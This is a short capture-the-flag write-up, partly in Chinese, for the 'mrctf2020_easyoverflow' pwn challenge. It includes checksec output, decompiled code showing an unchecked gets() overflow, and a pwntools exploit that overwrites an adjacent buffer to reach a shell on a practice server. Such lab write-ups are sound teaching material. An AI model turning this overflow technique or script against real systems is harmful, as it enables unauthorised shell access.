HugeH4rD

mrctf2020_easyoverflow

Ubuntu 16.04

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/mrctf2020_easyoverflow/mrctf2020_easyoverflow'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开

IDA

main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[48]; // [rsp+0h] [rbp-70h] BYREF
  char v5[24]; // [rsp+30h] [rbp-40h] BYREF
  __int64 v6; // [rsp+48h] [rbp-28h]
  __int64 v7; // [rsp+50h] [rbp-20h]
  __int64 v8; // [rsp+58h] [rbp-18h]
  __int16 v9; // [rsp+60h] [rbp-10h]
  unsigned __int64 v10; // [rsp+68h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  strcpy(v5, "ju3t_@_f@k3_f1@g");
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v9 = 0;
  gets(v4, argv);								//overflow
  if ( !(unsigned int)check((__int64)v5) )			//jmp
    exit(0);
  system("/bin/sh");
  return 0;
}

check()

__int64 __fastcall check(__int64 a1)
{
  int i; // [rsp+18h] [rbp-8h]
  int v3; // [rsp+1Ch] [rbp-4h]

  v3 = strlen(fake_flag);
  for ( i = 0; ; ++i )
  {
    if ( i == v3 )				//
      return 1LL;
    if ( *(_BYTE *)(i + a1) != fake_flag[i] )
      break;
  }
  return 0LL;
}

0x02

---

思路

gets()的溢出可以使v4覆盖v5

v5 = fake_flag即可

0x03

---

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 25496)
path = './mrctf2020_easyoverflow'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

a1 = b'n0t_r3@11y_f1@g'
v5 = 'ju3t_@_f@k3_f1@g'
padding = 0x70 - 0x40
payload = flat(b'a'*padding, a1)
io.sendline(payload)
io.interactive()